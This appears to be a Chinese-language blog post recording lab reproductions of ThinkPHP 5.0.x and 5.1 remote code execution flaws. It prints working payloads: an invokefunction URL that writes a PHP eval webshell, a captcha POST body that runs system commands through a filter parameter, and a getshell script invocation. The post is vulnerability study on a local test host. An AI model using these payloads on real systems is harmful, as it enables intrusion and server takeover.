Thinkphp漏洞整理

漏洞复现

Thinkphp5.0.20_RCE

0x00

image-20240212175935246

随便访问一个路径,然后获取报错信息

image-20240212181459575

5.0.* 版本

image-20240212181124540

thinkphp相关工具扫描结果发现路由过滤不严谨

那就直接使用payload 尝试

1
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?>

写入webshell

image-20240212181708466

27是成功写入的字符数

image-20240212181802779

Thinkphp5.0.23_RCE

0x00

直接尝试写入webshll

写入失败

0x01

尝试使用其他方式

post 

1
/index.php?s=captcha
1
2
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd	#POST传入参数

image-20240212184610488

利用成功

Thinkphp5.1_RCE

0x00

直接使用payload

image-20240212185121325

ThinkPHP5远程命令执行漏洞

0x00 部署thinkphp5

  1. 在centos 机器中,检查端口的开放情况

    image-20240212185859952

    确保Apache mysql php都开启

  2. 将ThinkPHP 5.1beta源码放到网站根目录/var/www/html

    image-20240212190129584

  3. 尝试访问

    image-20240212190322782

    部署成功

0x01 漏洞复现

1
python tp5-getshell.py -u http://10.1.1.100/thinkphp5.1beta/public/

image-20240212193111807

利用成功

getshell

image-20240212193246786

获取成功

#整理
Thinkphp漏洞整理
https://tsy244.github.io/2024/02/12/整理/Thinkphp漏洞整理/
Author
August Rosenberg
Posted on
February 12, 2024
Licensed under